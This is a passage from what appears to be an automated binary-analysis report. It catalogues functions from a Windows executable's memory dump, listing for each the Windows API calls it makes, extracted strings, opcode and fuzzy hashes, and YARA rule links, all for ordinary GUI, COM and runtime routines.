                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                      • Opcode ID: 1f72663b2793e490b10a354a78ab7b3be4149f56e165b85388da306506c3e323
                                                                                                                                                                      • Instruction ID: ee8bdeb88f0317da91c4a2e018a6c2090eaed175c034916a6c0cb4344cfca933
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f72663b2793e490b10a354a78ab7b3be4149f56e165b85388da306506c3e323
                                                                                                                                                                      • Instruction Fuzzy Hash: BB513071B10205AFDB19DF68DD95EAEBBBAEF88710F14812DF919D6290DB709D00CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0037201B, Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00371B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00372036,?,00000000,?,?,?,?,003716CB,00000000,?), ref: 00371B9A
                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003720D3
                                                                                                                                                                      • KillTimer.USER32(-00000001,?,?,?,?,003716CB,00000000,?,?,00371AE2,?,?), ref: 0037216E
                                                                                                                                                                      • DestroyAcceleratorTable.USER32 ref: 003ABEF6
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003716CB,00000000,?,?,00371AE2,?,?), ref: 003ABF27
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003716CB,00000000,?,?,00371AE2,?,?), ref: 003ABF3E
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003716CB,00000000,?,?,00371AE2,?,?), ref: 003ABF5A
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003ABF6C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 641708696-0
                                                                                                                                                                      • Opcode ID: 22d6e3f25c13ebd9c7b4570825d1266de6b80f5b9db45075108f658a2cce481f
                                                                                                                                                                      • Instruction ID: 9528467c1df701ecdecaf71bb4f68edc67e1fae433c23e8b7ab68515507aadf7
                                                                                                                                                                      • Opcode Fuzzy Hash: 22d6e3f25c13ebd9c7b4570825d1266de6b80f5b9db45075108f658a2cce481f
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A61CB30101601EFCB3BAF18CD48B2AB7F5FF45312F56D429E4468AA61C739A890DFA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003721A5, Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003725DB: GetWindowLongW.USER32(?,000000EB), ref: 003725EC
                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 003721D3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 259745315-0
                                                                                                                                                                      • Opcode ID: 41ace560c0e4c53c1646c0fa2aed9aa7606d54a6f13587c114fb066adbe67d98
                                                                                                                                                                      • Instruction ID: 977a5991e3b95b0fb4fbe1e5e56f07001ca477dd249ca5bd7b8eb58c7185f10f
                                                                                                                                                                      • Opcode Fuzzy Hash: 41ace560c0e4c53c1646c0fa2aed9aa7606d54a6f13587c114fb066adbe67d98
                                                                                                                                                                      • Instruction Fuzzy Hash: 15419231100144AFDB675F28DC88BBA3769EF06331F268265FD698A2E2C735CD42DB21
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DAB12, Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharLowerBuffW.USER32(?,?,003FF910), ref: 003DAB76
                                                                                                                                                                      • GetDriveTypeW.KERNEL32(00000061,0042A620,00000061), ref: 003DAC40
                                                                                                                                                                      • _wcscpy.LIBCMT ref: 003DAC6A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                      • API String ID: 2820617543-1000479233
                                                                                                                                                                      • Opcode ID: e0e8509c517252ba950ff52f685c4f284f6ea76dfbd45e34d31009fe060284b0
                                                                                                                                                                      • Instruction ID: a3242670c0b3f97844b4f9300f52cff4787bc8fcd05215f9aaa01b6f2fec432d
                                                                                                                                                                      • Opcode Fuzzy Hash: e0e8509c517252ba950ff52f685c4f284f6ea76dfbd45e34d31009fe060284b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 7951C3311187019FC726EF14D991A6AB7A5FF80300F50882FF4869B2A2DB35DD49CB53
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FC27C, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00372612: GetWindowLongW.USER32(?,000000EB), ref: 00372623
                                                                                                                                                                        • Part of subcall function 00372344: GetCursorPos.USER32(?,?,004367B0,?,004367B0,004367B0,?,003FC247,00000000,00000001,?,?,?,003ABC4F,?,?), ref: 00372357
                                                                                                                                                                        • Part of subcall function 00372344: ScreenToClient.USER32 ref: 00372374
                                                                                                                                                                        • Part of subcall function 00372344: GetAsyncKeyState.USER32(00000001), ref: 00372399
                                                                                                                                                                        • Part of subcall function 00372344: GetAsyncKeyState.USER32(00000002), ref: 003723A7
                                                                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 003FC2E4
                                                                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 003FC2EA
                                                                                                                                                                      • ReleaseCapture.USER32 ref: 003FC2F0
                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 003FC39A
                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003FC3AD
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 003FC48F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$prC$prC
                                                                                                                                                                      • API String ID: 1924731296-1053197900
                                                                                                                                                                      • Opcode ID: 363d4629d8c8db086d418d278c689f0a9dfbb98e8cadeba328bae6131a13e688
                                                                                                                                                                      • Instruction ID: d894849b291f898369525dab63949add46d57a6b3072b2931ec3826e9f059a45
                                                                                                                                                                      • Opcode Fuzzy Hash: 363d4629d8c8db086d418d278c689f0a9dfbb98e8cadeba328bae6131a13e688
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A518E70204309AFD716EF24C955F7A7BE5EF88310F10892DFA958B2E1CB75A948CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00379997, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __i64tow__itow__swprintf
                                                                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                                                                      • API String ID: 421087845-2263619337
                                                                                                                                                                      • Opcode ID: 190bdf13f54e86048d9d174f9be8f67cb46f20ce4affda3fd741230d89208f5f
                                                                                                                                                                      • Instruction ID: 37c931c75608fa45e5ad5fd53197f19a1ec23f175a634f99ba2e9de6e83c39e2
                                                                                                                                                                      • Opcode Fuzzy Hash: 190bdf13f54e86048d9d174f9be8f67cb46f20ce4affda3fd741230d89208f5f
                                                                                                                                                                      • Instruction Fuzzy Hash: B841C372604605AFEF36EB74D842F7673E8EB06300F20896FE64DDA291EB759941CB11
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F73C1, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003F73D9
                                                                                                                                                                      • CreateMenu.USER32 ref: 003F73F4
                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 003F7403
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F7490
                                                                                                                                                                      • IsMenu.USER32 ref: 003F74A6
                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 003F74B0
                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003F74DD
                                                                                                                                                                      • DrawMenuBar.USER32 ref: 003F74E5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                      • String ID: 0$F
                                                                                                                                                                      • API String ID: 176399719-3044882817
                                                                                                                                                                      • Opcode ID: 31bf5abb7ad37aa77d5963783a4e3cf06123ca26e58e3702e219de40babecf52
                                                                                                                                                                      • Instruction ID: f73270110bf367c2fefaa17135cd29ead296e2e8d291286cd89ba7c32c47bf65
                                                                                                                                                                      • Opcode Fuzzy Hash: 31bf5abb7ad37aa77d5963783a4e3cf06123ca26e58e3702e219de40babecf52
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C415675A01209EFDB22DF65D884AEABBB9FF49300F154029EE5997360D730A910CF60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F772A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003F77CD
                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 003F77D4
                                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003F77E7
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 003F77EF
                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 003F77FA
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 003F7803
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 003F780D
                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003F7821
                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003F782D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                      • String ID: static
                                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                                      • Opcode ID: 282420c84f915176ed92efbfb1630459a20b74ac8f587bdef3f64903ab58fd25
                                                                                                                                                                      • Instruction ID: e64b236ed3083cdbcd727a9657bac00c2f2c0b13dd634eb93a53294a22560a1e
                                                                                                                                                                      • Opcode Fuzzy Hash: 282420c84f915176ed92efbfb1630459a20b74ac8f587bdef3f64903ab58fd25
                                                                                                                                                                      • Instruction Fuzzy Hash: 30316C32105119BFDF129F64DC09FFA3B6DEF09364F114224FA15A61A0CB35D811DBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00397040, Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0039707B
                                                                                                                                                                        • Part of subcall function 00398D68: __getptd_noexit.LIBCMT ref: 00398D68
                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00397114
                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 0039714A
                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00397167
                                                                                                                                                                      • __allrem.LIBCMT ref: 003971BD
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003971D9
                                                                                                                                                                      • __allrem.LIBCMT ref: 003971F0
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0039720E
                                                                                                                                                                      • __allrem.LIBCMT ref: 00397225
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00397243
                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 003972B4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 384356119-0
                                                                                                                                                                      • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                                                                                                                      • Instruction ID: 97dc18098fba7c0aafc50fa7a38443a0fae29788480d2a73130b1c4777e000aa
                                                                                                                                                                      • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                                                                                                                      • Instruction Fuzzy Hash: F171D771A24716ABEB26AF79CC41B6AB3A8EF51324F14423AF414DB7C1E770DA408790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D2A16, Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003D2A31
                                                                                                                                                                      • GetMenuItemInfoW.USER32(00436890,000000FF,00000000,00000030), ref: 003D2A92
                                                                                                                                                                      • SetMenuItemInfoW.USER32 ref: 003D2AC8
                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 003D2ADA
                                                                                                                                                                      • GetMenuItemCount.USER32 ref: 003D2B1E
                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 003D2B3A
                                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 003D2B64
                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 003D2BA9
                                                                                                                                                                      • CheckMenuRadioItem.USER32 ref: 003D2BEF
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003D2C03
                                                                                                                                                                      • SetMenuItemInfoW.USER32 ref: 003D2C24
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4176008265-0
                                                                                                                                                                      • Opcode ID: 299ad36dc108f6a80471f02e98a8972539e7d7c94091d8cff95e6fc5c548d9fb
                                                                                                                                                                      • Instruction ID: 80035242f16c5eec877ea0f974846f9ef7c1bdbdcccd8684298df5747cbbbb60
                                                                                                                                                                      • Opcode Fuzzy Hash: 299ad36dc108f6a80471f02e98a8972539e7d7c94091d8cff95e6fc5c548d9fb
                                                                                                                                                                      • Instruction Fuzzy Hash: 05619DB2900249AFDB22CF64E888EBFBBB8EF61304F15456BE84197351D771AD05DB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F7192, Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003F7214
                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003F7217
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 003F723B
                                                                                                                                                                      • _memset.LIBCMT ref: 003F724C
                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003F725E
                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003F72D6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 830647256-0
                                                                                                                                                                      • Opcode ID: 5397aea3b60c8efa589200ec6efe61bb0ab171bae9fd56259f1ad8bcd0baf19e
                                                                                                                                                                      • Instruction ID: e669ca2c0d5c8b6f1c4e3b0b3125c351b2f6cce04c0c6832e5c6a28e55b2a494
                                                                                                                                                                      • Opcode Fuzzy Hash: 5397aea3b60c8efa589200ec6efe61bb0ab171bae9fd56259f1ad8bcd0baf19e
                                                                                                                                                                      • Instruction Fuzzy Hash: E1617B75900208AFDB21DFA4CC81EFE77F8EB09700F14416AFA15AB2A1C774A945DBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C710E, Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003C7135
                                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 003C718E
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003C71A0
                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 003C71C0
                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 003C7213
                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 003C7227
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003C723C
                                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 003C7249
                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003C7252
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003C7264
                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003C726F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                                      • Opcode ID: 11f981495676e1300705f991f575dbb24f724cd55f4d7e4ed727da3e2983ff29
                                                                                                                                                                      • Instruction ID: f376430103e0da75197a1158dacfe561904d035e60d2af562763843f847ffe2b
                                                                                                                                                                      • Opcode Fuzzy Hash: 11f981495676e1300705f991f575dbb24f724cd55f4d7e4ed727da3e2983ff29
                                                                                                                                                                      • Instruction Fuzzy Hash: 84412C35A04219AFCB12DF65D848EAEBBB9EF48354F008469F955EB261CB30AD45CF90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E86D0, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                      • CoInitialize.OLE32 ref: 003E8718
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 003E8723
                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00402BEC,?), ref: 003E8783
                                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 003E87F6
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003E8890
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003E88F1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                                                                      • Opcode ID: 1e0feee79519e5aae918a742b8a193951f5bbbb9ecf7fb155cf69e7055733cda
                                                                                                                                                                      • Instruction ID: 8eb25a710df4e69ceb5b2d977cd3c880d086069396fd12154e4e2b91462281e2
